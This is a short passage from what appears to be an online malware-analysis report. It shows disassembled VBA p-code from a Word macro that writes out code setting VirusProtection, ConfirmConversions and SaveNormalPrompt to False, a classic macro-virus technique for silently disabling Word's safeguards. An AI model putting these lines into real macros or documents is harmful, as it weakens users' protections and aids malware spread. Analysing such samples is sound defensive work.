' 	QuoteRem 0x0000 0x0011 " Click The Basics"
' Line #62:
' Line #63:
' 	Ld hFile 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x000C "With Options"
' 	PrintItemNL 
' Line #64:
' 	Ld hFile 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x001F "    .ConfirmConversions = False"
' 	PrintItemNL 
' Line #65:
' 	Ld hFile 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x001C "    .VirusProtection = False"
' 	PrintItemNL 
' Line #66:
' 	Ld hFile 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x001D "    .SaveNormalPrompt = False"
…

Open this report in the interactive analyzer, or submit your own file for analysis.